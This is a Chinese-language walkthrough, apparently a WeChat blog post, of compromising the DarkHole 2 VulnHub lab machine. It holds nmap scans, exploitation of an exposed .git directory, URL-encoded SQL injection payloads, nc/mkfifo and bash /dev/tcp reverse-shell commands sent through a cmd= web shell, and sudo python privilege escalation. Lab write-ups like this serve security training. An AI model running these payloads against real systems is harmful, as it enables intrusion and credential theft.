声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/darkhole/darkhole_2.zip
内容简介:
主机发现
端口扫描
信息收集
Git 库泄漏
源码分析
SQL注入
端口转发
信息收集
密码爆破
水平提权
Root提权
1.1 主机发现
arp-scan -l1.2 端口扫描
nmap -p- 192.168.112.1361.3 信息搜集
nmap -p22,80 -A 192.168.112.136Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 22:21 EDTNmap scan report for 192.168.112.136Host is up (0.00071s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)| 256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)|_ 256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))| http-git:| 192.168.112.136:80/.git/| Git repository found!| Repository description: Unnamed repository; edit this file 'description' to name the...|_ Last commit message: i changed login.php file for more secure| http-cookie-flags:| /:| PHPSESSID:|_ httponly flag not set|_http-title: DarkHole V2|_http-server-header: Apache/2.4.41 (Ubuntu)MAC Address: 00:0C:29:FF:A4:81 (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.6Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.71 ms 192.168.112.136OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
查看到了git版本
http://192.168.112.136/.git/1.4 Git库泄露
下载git库
wget -r http://192.168.112.136/.gitcd 192.168.112.136/git log // 查看更新日志git clone . backup //还原源代码git checkout a4d900a8d85e8938d3601f3cef113ee293028e10 //还原到第二次更新cat login.php
分析出在第二次更新的时候存在默认的身份认证
源代码还原到第二次的时候
a4d900a8d85e8938d3601f3cef113ee293028e10存在默认的账号密码
账户 lush@admin.com 密码 321登录页面http://192.168.112.136/login.php
登陆成功!
1.5 SQL注入
发现id=1存在sql注入字符型报错
http://192.168.112.136/dashboard.php?id=1http://192.168.112.136/dashboard.php?id=1%27+order+by+6--+ //查看字段数为 6http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,2,3,4,5,6--+ //查询字段位置
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,database(),3,4,5,6--+ //查数据库名称darkhole_2
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,table_name,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=%22darkhole_2%22--+ //查询表名称ssh
查询字段
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,GROUP_CONCAT(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_name=%22ssh%22--+id pass user
爆破字段
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,id,user,4,pass,6%20from%20ssh%20--+账户 jehad密码 fool
ssh登陆
ssh jehad@192.168.112.136 //密码 fool登陆成功
1.6 端口转发+信息收集
cat /etc/passwd// 查看用户信息root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinsystemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:103:106::/nonexistent:/usr/sbin/nologinsyslog:x:104:110::/home/syslog:/usr/sbin/nologin_apt:x:105:65534::/nonexistent:/usr/sbin/nologintss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/falseuuidd:x:107:112::/run/uuidd:/usr/sbin/nologintcpdump:x:108:113::/nonexistent:/usr/sbin/nologinlandscape:x:109:115::/var/lib/landscape:/usr/sbin/nologinpollinate:x:110:1::/var/cache/pollinate:/bin/falsesshd:x:111:65534::/run/sshd:/usr/sbin/nologinsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinlama:x:1000:1000:darkhole:/home/lama:/bin/bashlxd:x:998:100::/var/snap/lxd/common/lxd:/bin/falseusbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologinmysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/falsejehad:x:1001:1001:,,,:/home/jehad:/bin/bashlosy:x:1002:1002:,,,:/home/losy:/bin/bash
发现存在三个账户
losy jehad lamacd /homecd jehad/cat .bash_history
发现存在本地端口转发
ssh -L 127.0.0.1:90:192.168.135.129:9999 jehad@192.168.135.129curl "http://localhost:9999/?cmd=id"cat /etc/crontabexitcurl "http://localhost:9999/?cmd=wget http://google.com"curl "http://localhost:9999/?cmd=wget&http://google.com"curl "http://localhost:9999/?cmd=wget%20http://google.com"curl "http://localhost:9999/?cmd=chmod%20+s%20/bin/bash"ls -la /usr/bin/bashcurl "http://localhost:9999/?cmd=cat%20/etc/passwd"curl "http://localhost:9999/?cmd=nc%20-e%20/bin/sh%20192.168.135.128%204242"curl "http://localhost:9999/?cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202>&1|nc%20192.168.135.128%204242%20>/tmp/f"clearcurl "http://127.0.0.1:9999/?cmd=ls -la"curl "http://127.0.0.1:9999/?cmd=ls%20-la"curl "http://127.0.0.1:9999/?cmd=cd%20~&ls"curl "http://127.0.0.1:9999/?cmd=cd%20~&&ls"curl "http://127.0.0.1:9999/?cmd=cd%20~||ls"curl "http://127.0.0.1:9999/?cmd=cd%20/home/losy%20&&%20ls"
似乎是让别人攻击进入了
ss -pantu | grep 9999ps -ef | grep 9999cd /opt/webcat index.php://127.0.0.1:9999/?cmd=id
得到losy权限
1.7 水平提权
利用
https://gchq.github.io/CyberChef/进行url编码
bash -c "bash -i >& /dev/tcp/192.168.112.128/4242 0>&1"把反弹代码经过url编码得到payload
bash -c "bash -i >& /dev/tcp/192.168.112.128/4242 0>&1" |
bash%20%2Dc%20%22bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E112%2E128%2F4242%200%3E%261%22 |
执行此代码成功反弹shell,得到losy用户权限
curl http://127.0.0.1:9999/?cmd=bash%20%2Dc%20%22bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E112%2E128%2F4242%200%3E%261%221.8 root提权
cat .bash_historypython3 -c 'import pty;pty.spawn("/bin/bash")' //升级终端sudo -l // 密码 gangsudo python3 -c 'import pty;pty.spawn("/bin/bash")' //获得 root权限
发现密码password:gang
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
